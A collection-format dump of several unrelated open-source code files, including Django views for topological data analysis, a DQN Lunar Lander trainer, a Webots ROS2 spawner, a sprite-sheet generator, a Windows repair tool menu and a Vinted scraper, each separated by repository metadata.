'research_slug': self.kwargs['research_slug'],
'analysis_slug': self.analysis.slug
})
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['research'] = self.research
return context
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
self.research = get_object_or_404(
Research,
slug=self.kwargs['research_slug']
)
kwargs['research'] = self.research
return kwargs
def form_valid(self, form):
self.analysis = form.save(commit=False)
self.analysis.precomputed_distance_matrix_json = self.precomputed_distance_matrix_json
return super().form_valid(form)
def post(self, request, *args, **kwargs):
self.object = None
form_class = self.get_form_class()
form = self.get_form(form_class)
files = request.FILES.getlist('precomputed_distance_matrix')
if form.is_valid():
precomputed_distance_matrixes = []
for f in files:
precomputed_distance_matrixes.append(numpy.loadtxt(f).tolist())
self.precomputed_distance_matrix_json = json.dumps(precomputed_distance_matrixes)
return self.form_valid(form)
else:
return self.form_invalid(form)
class MapperAnalysisView(View):
def get(self, request, *args, **kwargs):
my_analysis = get_object_or_404(
MapperAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
my_window = get_object_or_404(
MapperWindow,
analysis=my_analysis,
slug=self.kwargs['window_slug']
)
return HttpResponse(my_window.graph)
class WindowDetailView(DetailView):
def get(self, request, *args, **kwargs):
my_analysis = (FiltrationAnalysis.objects.filter(
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
).first()
or
MapperAnalysis.objects.filter(
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
).first())
if type(my_analysis) is FiltrationAnalysis:
my_window = get_object_or_404(
FiltrationWindow,
analysis=my_analysis,
slug=self.kwargs['window_slug']
)
elif type(my_analysis) is MapperAnalysis:
my_window = get_object_or_404(
MapperWindow,
analysis=my_analysis,
slug=self.kwargs['window_slug']
)
if isinstance(my_window, FiltrationWindow):
return render(request, 'analysis/window/filtrationwindow_detail.html', context={'window': my_window,
'homology': range(my_analysis.max_homology_dimension + 1)})
elif isinstance(my_window, MapperWindow):
return render(request, 'analysis/window/mapperwindow_detail.html', context={'window': my_window})
class WindowListView(ListView):
model = Window
context_object_name = 'windows'
paginate_by = 10
template_name = "analysis/window/window_list.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['analysis'] = self.analysis
return context
def get_queryset(self):
self.analysis = (FiltrationAnalysis.objects.filter(
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
).first()
or
MapperAnalysis.objects.filter(
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
).first())
if type(self.analysis) is FiltrationAnalysis:
windows = FiltrationWindow.objects.filter(
analysis=self.analysis
)
elif type(self.analysis) is MapperAnalysis:
windows = MapperWindow.objects.filter(
analysis=self.analysis
)
return windows.only('name', 'creation_date', 'slug').order_by('name')
class WindowBottleneckView(View):
def get(self, request, *args, **kwargs):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
my_window = get_object_or_404(
FiltrationWindow,
analysis=my_analysis,
slug=self.kwargs['window_slug']
)
my_window.bottleneck_calculation_onetoall(self.kwargs['homology'])
bottleneck = my_window.get_bottleneck(self.kwargs['homology'])
diagram_list = bottleneck.get_diagrams()
page = request.GET.get('page', 1)
paginator = Paginator(diagram_list, 10)
try:
diagrams = paginator.page(page)
except PageNotAnInteger:
diagrams = paginator.page(1)
except EmptyPage:
diagrams = paginator.page(paginator.num_pages)
return render(request, 'analysis/window/filtrationwindow_bottleneck.html', context={'diagrams': diagrams,
'window': my_window})
class AnalysisConsecutiveBottleneckView(View):
def get(self, request, *args, **kwargs):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
my_analysis.bottleneck_calculation_consecutive(self.kwargs['homology'])
bottleneck = my_analysis.get_bottleneck(Bottleneck.CONS, self.kwargs['homology'])
diagram_list = bottleneck.get_diagrams()
page = request.GET.get('page', 1)
paginator = Paginator(diagram_list, 10)
try:
diagrams = paginator.page(page)
except PageNotAnInteger:
diagrams = paginator.page(1)
except EmptyPage:
diagrams = paginator.page(paginator.num_pages)
return render(request, 'analysis/filtrationanalysis_bottleneck_consecutive.html',
context={'diagrams': diagrams,
'analysis': my_analysis
})
class AnalysisAlltoallBottleneckView(View):
def get(self, request, *args, **kwargs):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
my_analysis.bottleneck_calculation_alltoall(self.kwargs['homology'])
bottleneck = my_analysis.get_bottleneck(Bottleneck.ALL, self.kwargs['homology'])
diagram_list = bottleneck.get_diagrams()
page = request.GET.get('page', 1)
paginator = Paginator(diagram_list, 10)
try:
diagrams = paginator.page(page)
except PageNotAnInteger:
diagrams = paginator.page(1)
except EmptyPage:
diagrams = paginator.page(paginator.num_pages)
return render(request, 'analysis/filtrationanalysis_bottleneck_alltoall.html',
context={'diagrams': diagrams,
'analysis': my_analysis
})
class RipserDownloadView(VirtualDownloadView):
def get_object(self):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
return get_object_or_404(
FiltrationWindow,
analysis=my_analysis,
slug=self.kwargs['window_slug']
)
def get_file(self):
window_analysis = self.get_object()
return ContentFile(window_analysis.result_matrix, name=window_analysis.analysis.research.name + '_' +
window_analysis.analysis.name + '_' + str(window_analysis.name) + '.dat')
class EntropyDownloadView(VirtualDownloadView):
def get_object(self):
return get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
def get_file(self):
analysis = self.get_object()
return ContentFile(analysis.get_entropy_csv(), name=analysis.research.name + '_' +
analysis.name + '_entropy.csv')
class BottleneckONEDownloadView(VirtualDownloadView):
def get_object(self):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
my_window = get_object_or_404(
FiltrationWindow,
analysis=my_analysis,
slug=self.kwargs['window_slug']
)
return get_object_or_404(
Bottleneck,
window=my_window,
kind=Bottleneck.ONE,
homology=self.kwargs['homology']
)
def get_file(self):
bottleneck = self.get_object()
return ContentFile(bottleneck.get_bottleneck_matrix(),
name=bottleneck.window.analysis.research.name + '_' +
bottleneck.window.analysis.name + '_' +
str(bottleneck.window.name) + '_bottleneck_distance_one_to_all_H' + str(bottleneck.homology)
+ '.csv')
class BottleneckALLDownloadView(VirtualDownloadView):
def get_object(self):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
return get_object_or_404(
Bottleneck,
analysis=my_analysis,
kind=Bottleneck.ALL,
homology=self.kwargs['homology']
)
def get_file(self):
bottleneck = self.get_object()
return ContentFile(bottleneck.get_bottleneck_matrix(), name=bottleneck.analysis.research.name + '_'
+ bottleneck.analysis.name + '_bottleneck_distance_all_to_all_H' +
str(bottleneck.homology) + '.csv')
class BottleneckCONSDownloadView(VirtualDownloadView):
def get_object(self):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
return get_object_or_404(
Bottleneck,
analysis=my_analysis,
kind=Bottleneck.CONS,
homology=self.kwargs['homology']
)
def get_file(self):
bottleneck = self.get_object()
return ContentFile(bottleneck.get_bottleneck_matrix(), name=bottleneck.analysis.research.name + '_'
+ bottleneck.analysis.name + '_bottleneck_distance_consecutive_H' +
str(bottleneck.homology) + '.csv')
def AnalysisBottleneckCreateView(request, research_slug, analysis_slug):
research = get_object_or_404(Research, slug=research_slug)
analysis = get_object_or_404(FiltrationAnalysis, research=research, slug=analysis_slug)
# if this is a POST request we need to process the form data
if request.method == 'POST':
# create a form instance and populate it with data from the request:
form = AnalysisBottleneckCreationForm(analysis.max_homology_dimension, request.POST)
# check whether it's valid:
if form.is_valid():
cleaned_data = form.cleaned_data
bottleneck_type = cleaned_data.get("bottleneck_type")
homology = cleaned_data.get("homology")
if bottleneck_type == Bottleneck.CONS:
return redirect('analysis:analysis-bottleneck-consecutive', homology=homology,
analysis_slug=analysis.slug, research_slug=research.slug)
elif bottleneck_type == Bottleneck.ALL:
return redirect('analysis:analysis-bottleneck-alltoall', homology=homology,
analysis_slug=analysis.slug, research_slug=research.slug)
# if a GET (or any other method) we'll create a blank form
else:
form = AnalysisBottleneckCreationForm(analysis.max_homology_dimension)
return render(request, 'analysis/analysis_bottleneck_form.html',
{'form': form, 'research': research, 'analysis': analysis})
def WindowBottleneckCreateView(request, research_slug, analysis_slug, window_slug):
research = get_object_or_404(Research, slug=research_slug)
analysis = get_object_or_404(FiltrationAnalysis, research=research, slug=analysis_slug)
window = get_object_or_404(FiltrationWindow, analysis=analysis, slug=window_slug)
# if this is a POST request we need to process the form data
if request.method == 'POST':
# create a form instance and populate it with data from the request:
form = WindowBottleneckCreationForm(analysis.max_homology_dimension, request.POST)
# check whether it's valid:
if form.is_valid():
cleaned_data = form.cleaned_data
homology = cleaned_data.get("homology")
return redirect('analysis:window-bottleneck-onetoall', homology=homology,
window_slug=window.slug,
analysis_slug=analysis.slug, research_slug=research.slug)
# if a GET (or any other method) we'll create a blank form
else:
form = WindowBottleneckCreationForm(analysis.max_homology_dimension)
return render(request, 'analysis/window/window_bottleneck_form.html',
{'form': form, 'research': research, 'analysis': analysis, 'window': window})
class ALLBottleneckDeleteView(DeleteView):
model = Bottleneck
context_object_name = 'bottleneck'
template_name = "analysis/bottleneck_confirm_delete_ALL.html"
def get_object(self):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
return get_object_or_404(
Bottleneck,
analysis=my_analysis,
homology=self.kwargs['homology'],
kind=Bottleneck.ALL
)
def get_success_url(self):
return reverse_lazy('analysis:analysis-detail', kwargs={
'research_slug': self.kwargs['research_slug'],
'analysis_slug': self.kwargs['analysis_slug']
})
class CONSBottleneckDeleteView(DeleteView):
model = Bottleneck
context_object_name = 'bottleneck'
template_name = "analysis/bottleneck_confirm_delete_CONS.html"
def get_object(self):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
return get_object_or_404(
Bottleneck,
analysis=my_analysis,
homology=self.kwargs['homology'],
kind=Bottleneck.CONS
)
def get_success_url(self):
return reverse_lazy('analysis:analysis-detail', kwargs={
'research_slug': self.kwargs['research_slug'],
'analysis_slug': self.kwargs['analysis_slug']
})
class ONEBottleneckDeleteView(DeleteView):
model = Bottleneck
context_object_name = 'bottleneck'
template_name = "analysis/window/bottleneck_confirm_delete_ONE.html"
def get_object(self):
my_analysis = get_object_or_404(
FiltrationAnalysis,
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
)
my_window = get_object_or_404(
FiltrationWindow,
analysis=my_analysis,
slug=self.kwargs['window_slug']
)
return get_object_or_404(
Bottleneck,
window=my_window,
homology=self.kwargs['homology'],
kind=Bottleneck.ONE
)
def get_success_url(self):
return reverse_lazy('analysis:window-detail', kwargs={
'research_slug': self.kwargs['research_slug'],
'analysis_slug': self.kwargs['analysis_slug'],
'window_slug': self.kwargs['window_slug']
})
``` |
{
"source": "098799/monitour",
"score": 3
} |
#### File: 098799/monitour/monitour.py
```python
import datetime
import os
import os.path
import requests
import time
temp_refresh_rate = 1000
temp_location = "barcelona"
def addon(which):
if which in (1, 21, 31):
return "st"
elif which in (2, 22):
return "nd"
elif which in (3, 23):
return "rd"
else:
return "th"
def center(string):
padding = (terminal_width - len(string))//2
return padding * " " + string + padding * " "
def fineprint(outlist):
out = "|" + " " * 2
padding = "|" + " " * 2
for item in outlist:
out += item
out += 2* " " + "|" + 2 * " "
padding += " " * len(item)
padding += 2* " " + "|" + 2 * " "
out = out[:-2]
padding = padding[:-2]
print("\n" * ((int(terminal_height)-9)//2))
print(center(ul(out)))
print(center(padding))
print(center(out))
print(center(padding))
print(center(ul(out)))
print("\n" * ((int(terminal_height)-7)//2))
def ul(string):
return "+" +"-" * (len(string)-2) + "+"
def check_temperature():
file_name = "/tmp/outside_temperature"
if os.path.exists(file_name):
modified = os.path.getmtime(file_name)
if (time.time() - modified) < temp_refresh_rate:
with open(file_name, 'r') as infile:
temperature = infile.read()
return temperature
rr = requests.get("https://query.yahooapis.com/v1/public/yql?q=select item.condition.temp from weather.forecast where woeid in (select woeid from geo.places(1) where text%3D%22{0}%22)&format=json&env=store%3A%2F%2Fdatatables.org%2Falltableswithkeys".format(temp_location))
temp = rr.json()['query']['results']['channel']['item']['condition']['temp']
temperature = str((int(temp)-32)*5//9)+ "°C"
with open(file_name, 'w') as outfile:
outfile.write(temperature)
return temperature
check_temperature()
today = datetime.datetime.now()
terminal_width = os.get_terminal_size().columns
terminal_height = os.get_terminal_size().lines
today_date = str(today.strftime("%A, %-d" + addon(today.day) + " of %B"))
now_time = str(today.strftime("%-H:%M"))
fineprint([today_date, now_time, check_temperature()])
``` |
{
"source": "09jvilla/CS234_gym",
"score": 3
} |
#### File: CS234_gym/vanilla_DoubleDQN/Deep_Q_Network_Solution.py
```python
import gym
import random
import torch
import numpy as np
from collections import deque
import matplotlib.pyplot as plt
import pdb
# ### 2. Instantiate the Environment and Agent
#
# Initialize the environment in the code cell below.
# In[2]:
env = gym.make('LunarLander-v2')
env.sparse_rewards=True
env.seed(0)
print('State shape: ', env.observation_space.shape)
print('Number of actions: ', env.action_space.n)
# Please refer to the instructions in `Deep_Q_Network.ipynb` if you would like to write your own DQN agent. Otherwise, run the code cell below to load the solution files.
# In[3]:
from dqn_agent import Agent
agent = Agent(state_size=8, action_size=4, seed=0, enable_curiosity=False)
# watch an untrained agent
state = env.reset()
for j in range(200):
action = agent.act(state)
env.render()
state, reward, done, _ = env.step(action)
if done:
break
env.close()
# ### 3. Train the Agent with DQN
#
# Run the code cell below to train the agent from scratch. You are welcome to amend the supplied values of the parameters in the function, to try to see if you can get better performance!
#
# Alternatively, you can skip to the next step below (**4. Watch a Smart Agent!**), to load the saved model weights from a pre-trained agent.
# In[4]:
def dqn(n_episodes=2000, max_t=1000, eps_start=1.0, eps_end=0.01, eps_decay=0.995):
"""Deep Q-Learning.
Params
======
n_episodes (int): maximum number of training episodes
max_t (int): maximum number of timesteps per episode
eps_start (float): starting value of epsilon, for epsilon-greedy action selection
eps_end (float): minimum value of epsilon
eps_decay (float): multiplicative factor (per episode) for decreasing epsilon
"""
scores = [] # list containing scores from each episode
scores_window = deque(maxlen=100) # last 100 scores
eps = eps_start # initialize epsilon
for i_episode in range(1, n_episodes+1):
state = env.reset()
score = 0
for t in range(max_t):
action = agent.act(state, eps)
next_state, reward, done, _ = env.step(action)
agent.step(state, action, reward, next_state, done)
state = next_state
score += reward
if done:
break
scores_window.append(score) # save most recent score
scores.append(score) # save most recent score
eps = max(eps_end, eps_decay*eps) # decrease epsilon
print('\rEpisode {}\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)), end="")
if i_episode % 100 == 0:
print('\rEpisode {}\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)))
if np.mean(scores_window)>=200.0:
print('\nEnvironment solved in {:d} episodes!\tAverage Score: {:.2f}'.format(i_episode-100, np.mean(scores_window)))
torch.save(agent.qnetwork_local.state_dict(), 'checkpoint.pth')
break
return scores
scores = dqn()
fig=plt.figure()
ax = fig.add_subplot(111)
l1 = [tup[0] for tup in agent.loss_list]
l2 = [tup[1] for tup in agent.loss_list]
l3 = [tup[2] for tup in agent.loss_list]
plt.plot(np.arange(len(agent.loss_list)), l1)
plt.plot(np.arange(len(agent.loss_list)), l2)
plt.plot(np.arange(len(agent.loss_list)), l3)
plt.legend(["loss1","loss2","loss3"])
plt.show()
# plot the scores
fig = plt.figure()
ax = fig.add_subplot(111)
plt.plot(np.arange(len(scores)), scores)
plt.ylabel('Score')
plt.xlabel('Episode #')
plt.show()
# ### 4. Watch a Smart Agent!
#
# In the next code cell, you will load the trained weights from file to watch a smart agent!
# In[ ]:
"""
# load the weights from file
agent.qnetwork_local.load_state_dict(torch.load('checkpoint.pth'))
for i in range(3):
state = env.reset()
for j in range(200):
action = agent.act(state)
env.render()
state, reward, done, _ = env.step(action)
if done:
break
env.close()
"""
# ### 5. Explore
#
# In this exercise, you have implemented a DQN agent and demonstrated how to use it to solve an OpenAI Gym environment. To continue your learning, you are encouraged to complete any (or all!) of the following tasks:
# - Amend the various hyperparameters and network architecture to see if you can get your agent to solve the environment faster. Once you build intuition for the hyperparameters that work well with this environment, try solving a different OpenAI Gym task with discrete actions!
# - You may like to implement some improvements such as prioritized experience replay, Double DQN, or Dueling DQN!
# - Write a blog post explaining the intuition behind the DQN algorithm and demonstrating how to use it to solve an RL environment of your choosing.
``` |
{
"source": "09labs/rocket",
"score": 2
} |
#### File: calls/auth/get_me.py
```python
import logging
from rocketchat.calls.base import RocketChatBase
logger = logging.getLogger(__name__)
class GetMe(RocketChatBase):
endpoint = '/api/v1/me'
def build_endpoint(self, **kwargs):
return self.endpoint
def post_response(self, result):
return result
``` |
{
"source": "09ubberboy90/lvl4-ros2-sim-comp",
"score": 2
} |
#### File: sim_spawner/sim_spawner/webots_spawner.py
```python
import rclpy
import os
import sys
from webots_ros2_core.webots_node import WebotsNode
from webots_ros2_core.utils import append_webots_python_lib_to_path
from webots_ros2_core.trajectory_follower import TrajectoryFollower
from sensor_msgs.msg import JointState
from ament_index_python.packages import get_package_share_directory
from geometry_msgs.msg import Pose, Point, Quaternion
from gazebo_msgs.srv import GetEntityState, GetModelList
from gazebo_msgs.msg import EntityState
import pyquaternion
try:
append_webots_python_lib_to_path()
from controller import Node
except Exception as e:
sys.stderr.write('"WEBOTS_HOME" is not correctly set.')
raise e
class SpawnerNode(WebotsNode):
def __init__(self, args=None):
super().__init__("spawner", args)
self.package_dir = get_package_share_directory('webots_simple_arm')
self.children = self.robot.getRoot().getField("children")
self.entity = self.create_service(
GetEntityState, 'get_entity_state', self.get_entity_state)
self.model = self.create_service(
GetModelList, 'get_model_list', self.get_model_list)
self.objs = {}
self.robot.simulationSetMode(self.robot.SIMULATION_MODE_FAST)
self.spawn_obj("worlds/Table.wbo", rotation = [1,0,0,1.57])
self.spawn_obj("worlds/Cube.wbo", position = [0.3-0.6, 0, 0.55])
# for x in range(-4, 5):
# for y in range(-4, 5):
# if x == 0.3 and y == 0:
# continue
# self.spawn_obj("worlds/Cube.wbo", [x/10, y/10, 0.55])
def spawn_obj(self, path, position=[0, 0, 0], offset=[0.6, 0, 0], rotation = [0,1,0,0]):
out = []
for i, j in zip(position, offset):
out.append(i+j)
self.children.importMFNode(0, os.path.join(self.package_dir, path))
obj = self.children.getMFNode(0)
obj.getField("translation").setSFVec3f(out)
obj.getField("rotation").setSFRotation(rotation)
self.objs[obj.getField("name").getSFString()] = obj
def get_model_list(self, request: GetModelList.Request, response: GetModelList.Response):
response.model_names = list(self.objs.keys())
response.success = True
return response
def get_entity_state(self, request: GetEntityState.Request, response: GetEntityState.Response):
obj = self.objs.get(request.name)
if obj is None:
response.success = False
return response
state = EntityState()
state.name = request.name
pose = Pose()
pose.position = self.get_postion(obj)
pose.orientation = self.get_rotation(obj)
state.pose = pose
response.state = state
response.success = True
return response
def get_postion(self, obj):
position = Point()
obj_pose = obj.getField("translation").getSFVec3f()
position.x = obj_pose[0]
position.y = obj_pose[1]
position.z = obj_pose[2]
return position
def get_rotation(self, obj):
rotation = Quaternion()
obj_rot = obj.getField("rotation").getSFRotation()
quat = pyquaternion.Quaternion(axis=obj_rot[:3], angle=obj_rot[3])
rotation.x = float(quat.x)
rotation.y = float(quat.y)
rotation.z = float(quat.z)
rotation.w = float(quat.w)
return rotation
def main(args=None):
rclpy.init(args=args)
os.environ['WEBOTS_ROBOT_NAME'] = "spawner"
spawner = SpawnerNode(args=args)
rclpy.spin(spawner)
rclpy.shutdown()
if __name__ == '__main__':
main()
``` |
{
"source": "0a0r/PersonalTools",
"score": 3
} |
#### File: 0a0r/PersonalTools/SpriteSheetGenerator.py
```python
import cv2
import os
import numpy as np
import sys
def GetDesiredWidthAndHeight(spritesCnt):
bits = spritesCnt.bit_length()
width = 1
height = 1
if spritesCnt != (1 << (bits - 1)):
bits += 1
if bits & 1:
width = (1 << (bits >> 1))
height = width
else:
width = (1 << (bits >> 1))
height = width >> 1
return (width, height)
def GetIndexByCoords(width, height, imgWidth):
return height * imgWidth + width
def GenerateSpriteSheet(inputPath, outputPath):
spritesFilePaths = []
# Read all files path from input path
for root, dirs, files, in os.walk(inputPath):
for file in files:
if file.endswith('.png'):
spritesFilePaths.append(os.path.join(root, file))
# Empty list
spritesList = []
spritesCnt = len(spritesFilePaths)
if spritesCnt == 0:
return
for i in range(0, spritesCnt):
sprite = cv2.imread(spritesFilePaths[i], cv2.IMREAD_UNCHANGED)
spritesList.append(sprite)
(imgWidth, imgHeight, imgCol) = spritesList[0].shape
(spriteSheetWidthCnt, spriteSheetHeightCnt) = GetDesiredWidthAndHeight(spritesCnt)
spriteSheetResult = np.zeros
spriteEmptyPlaceholder = np.full((imgWidth, imgHeight, 4), (255, 255, 255, 0), np.uint8)
for h in range(0, spriteSheetHeightCnt):
spriteSheetHorizontalResult = spriteEmptyPlaceholder
for w in range(0, spriteSheetWidthCnt):
indx = GetIndexByCoords(w, h, spriteSheetWidthCnt)
spriteSheetCurrent = spriteEmptyPlaceholder
if indx < spritesCnt:
spriteSheetCurrent = spritesList[indx]
if w == 0:
spriteSheetHorizontalResult = spriteSheetCurrent
else:
spriteSheetHorizontalResult = cv2.hconcat([spriteSheetHorizontalResult, spriteSheetCurrent])
if h == 0:
spriteSheetResult = spriteSheetHorizontalResult
else:
spriteSheetResult = cv2.vconcat([spriteSheetResult, spriteSheetHorizontalResult])
filePrefix = inputPath.split('\\')[-1]
cv2.imwrite(os.path.join(outputPath, filePrefix + '_Output.png'), spriteSheetResult)
if __name__ == "__main__":
GenerateSpriteSheet(sys.argv[1], sys.argv[2])
``` |
{
"source": "0AliReza0/WindowsMedicator",
"score": 3
} |
#### File: WindowsMedicator/WindowsMedicator(exe)/AdminPrivileges.py
```python
import ctypes
import platform
from colorama.ansi import Fore
""" This Class Needs Access to System For Scanning Your System's Health """
class RunProgramAsAdmin:
def IsAdmin():
if (platform.system()[0].upper() in ["W"]):
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
class ScriptHeaders:
def ShowHeaders():
ASCII = """{0}
/////////////. ,/////////////
/////////////////// .///////////////////
/////////////////////// ///////////////////////
/////////////////////////////////////////////////
/////////////////// ////////////////////////////
////////////////// //////. ///////////////////
///////////////// ,//// ./////////////////
//////////////// /// ,///////////////.
.///////////// , / ,
,,, ,,,
,,,,,,,,,,,,,,, ,,,,,,,,,,,,,,,.
,,,,,,,,,,,,, ,,,,,,,,,,,,,,
,,,,,,,,,,, ,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,
,,,,,,,,,,
,,,,,
,,, {1} Version : 2.0.0
""".format(Fore.GREEN , Fore.WHITE)
print(f"{ASCII}\n")
print(f"{Fore.MAGENTA}[{Fore.GREEN}+{Fore.MAGENTA}] {Fore.WHITE}Windows Medicator Created By shervinbdndev\n\n\n")
print(f"\t{Fore.GREEN}[ Safe Zone ]")
print(f"{Fore.MAGENTA}[{Fore.GREEN}1{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Check System's Health")
print(f"{Fore.MAGENTA}[{Fore.GREEN}2{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Scan System's Health")
print(f"{Fore.MAGENTA}[{Fore.GREEN}3{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Restore System's Health")
print(f"{Fore.MAGENTA}[{Fore.GREEN}4{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Repair install.esd Image")
print(f"{Fore.MAGENTA}[{Fore.GREEN}5{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Repair windows Installation Image")
print(f"{Fore.MAGENTA}[{Fore.GREEN}6{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Check System's Disks")
print(f"{Fore.MAGENTA}[{Fore.GREEN}7{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Internet Connection Problem\n\n")
print(f"\t{Fore.RED}[ Danger Zone ]")
print(f"{Fore.MAGENTA}[{Fore.GREEN}8{Fore.MAGENTA}] {Fore.YELLOW}(DANGER) {Fore.WHITE}Uninstall & Delete All Windows Builtins Apps")
print(f"{Fore.MAGENTA}[{Fore.GREEN}9{Fore.MAGENTA}] {Fore.RED}(DANGER) {Fore.WHITE}Reset Factory PC\n\n")
print(f"{Fore.MAGENTA}[{Fore.GREEN}99{Fore.MAGENTA}] {Fore.WHITE}Exit")
``` |
{
"source": "0AlphaZero0/Vinted-data",
"score": 2
} |
#### File: 0AlphaZero0/Vinted-data/collect_data.py
```python
import requests
import json
import re
# api_url = "https://www.vinted.fr/api/v2/items?search_text=&catalog_ids=&color_ids=&brand_ids=&size_ids=&material_ids=&status_ids=&country_ids=&city_ids=&is_for_swap=0&page=1&per_page="
url = "https://www.vinted.fr/vetements?search_text=&brand_id[]=&color_id[]="
url_search_txt = "https://www.vinted.fr/vetements?search_text="
# brands_url = "https://www.vinted.fr/brands"
# catalogs_url = "https://www.vinted.fr/data/search-json.js"
data_repository = "./DATA/"
applicationJSON = r'<script type="application/json" data-js-react-on-rails-store="MainStore">([^<]+)</script>'
id_supported = {
"catalog":{
"regex":applicationJSON,
"nested":"catalogs",
"names":["title","code"],
"mainStore":"catalogs",
"url_name":"catalog[]"
},
"color":{
"regex":applicationJSON,
"names":["title","code"],
"mainStore":"colors",
"url_name":"color_id[]"
},
"brand":{
"names":["title","slug"],
"url_name":"brand_id[]"
},
"size":{
"regex":applicationJSON,
"nested":"sizes",
"names":["title"],
"only_string":True,
"mainStore":"sizeGroups",
"url_name":"size_id[]"
},
"material":{
"regex":applicationJSON,
"nested":"materials",
"names":["title","code"],
"mainStore":"materialGroups",
"url_name":"material_id[]"
},
"status":{
"regex":applicationJSON,
"names":["title"],
"mainStore":"statuses",
"url_name":"status_id[]"
}
# "country":{
# "regex":applicationJSON,
# "names":["title","title_local","iso_code"],
# "mainStore":"countries",
# "url_name":"country_id[]"
# }
}
def JSONfromID(id_names=[x for x in id_supported],id_range=range(0,100),per_page=24,save=False,empty_ids=False):
"""
This function will extract information from Vinted about the ids requested.
Parameters
----------
id_names : LIST or STRING, optional
This parameter indicate which ids you want to extract from Vinted. The default is ["catalog","color","brand","size","material","status","country"].
id_range : RANGE, optional
This parameter is used to extract a range of ids for example from 0 to 1000. This parameter is only used to extract brand ids. The default is range(0,100).
per_page : INTEGER, optional
This parameter is the number of item per page in the resulting response the best to extract ids corresponds to 24. The default is 24.
save : BOOLEAN, optional
This parameter is used to saved ids found in the DATA folder, as following : ./DATA/*id_name*.json. The default is False.
empty_ids : BOOLEAN, optional
This parameter is used only for the brand id results. Indeed some brands ids point to nothing, if you want those empty ids in your results set this parameter to True. The default is False.
Returns
-------
collected_data : DICTIONARY
This dictrionary will contains every ids found. For example if the id_names parameter was ["color","status"] the dictionary will look like this :
{
"color":[
{
"id": 1,
"title": "Noir",
"hex": "000000",
"order": 1,
"code": "BLACK"
},
{
"id": 3,
"title": "Gris",
"hex": "919191",
"order": 2,
"code": "GREY"
},
.
.
.
],
"status":[
{
"id": 6,
"title": "Neuf avec \u00e9tiquette",
"description": "Article neuf, jamais port\u00e9/utilis\u00e9 avec \u00e9tiquettes ou dans son emballage d\u2019origine.",
"explanation": "Article neuf, jamais port\u00e9/utilis\u00e9 avec \u00e9tiquettes ou dans son emballage d\u2019origine.",
"explanation_title": "Cet article est flambant neuf ?",
"is_default": 0,
"order": 5
},
{
"id": 1,
"title": "Neuf sans \u00e9tiquette",
"description": "Article neuf, jamais port\u00e9/utilis\u00e9, sans \u00e9tiquettes ni emballage d\u2019origine.",
"explanation": "Article neuf, jamais port\u00e9/utilis\u00e9, sans \u00e9tiquettes ni emballage d\u2019origine.",
"explanation_title": "L\u2019article n\u2019a plus d\u2019\u00e9tiquette, mais il n\u2019a jamais \u00e9t\u00e9 port\u00e9 ?",
"is_default": 0,
"order": 10
},
.
.
.
]
}
"""
def brandIds(id_name,id_supported,id_range=id_range,per_page=per_page,empty_ids=empty_ids):
"""
This function will extract a range of brand ids from Vinted and their corresponding information.
Parameters
----------
id_name : STRING
This parameter is not used here but essential.
id_supported : DICTIONARY
This parameter is not used here but essential.
id_range : RANGE, optional
This parameter is used to extract a range of ids for example from 0 to 1000. This parameter is only used to extract brand ids. The default is range(0,100).
per_page : INTEGER, optional
This parameter is the number of item per page in the resulting response the best to extract ids corresponds to 24. The default is 24.
empty_ids : BOOLEAN, optional
This parameter is used only for the brand id results. Indeed some brands ids point to nothing, if you want those empty ids in your results set this parameter to True. The default is False.
Returns
-------
id_DATA : LIST
This list will contains every brand ids found and their corresponding information.
"""
def chunks(lst, n):
"""
This function will create sublists of size n from the list lst.
Parameters
----------
lst : LIST
This parameter is not used here but essential.
n : INTEGER
This parameter is not used here but essential.
Returns
-------
None
"""
for i in range(0, len(lst), n):
yield lst[i:i + n]
chunk_size = 50
id_DATA = []
ids_to_scan = chunks([i for i in id_range],chunk_size)
x = 0
for chunk in ids_to_scan:
x += 1
chunk = [str(s) for s in chunk]
new_url = url_search_txt+"&brand_id[]="+"&brand_id[]=".join(chunk)
req = requests.get(new_url).text
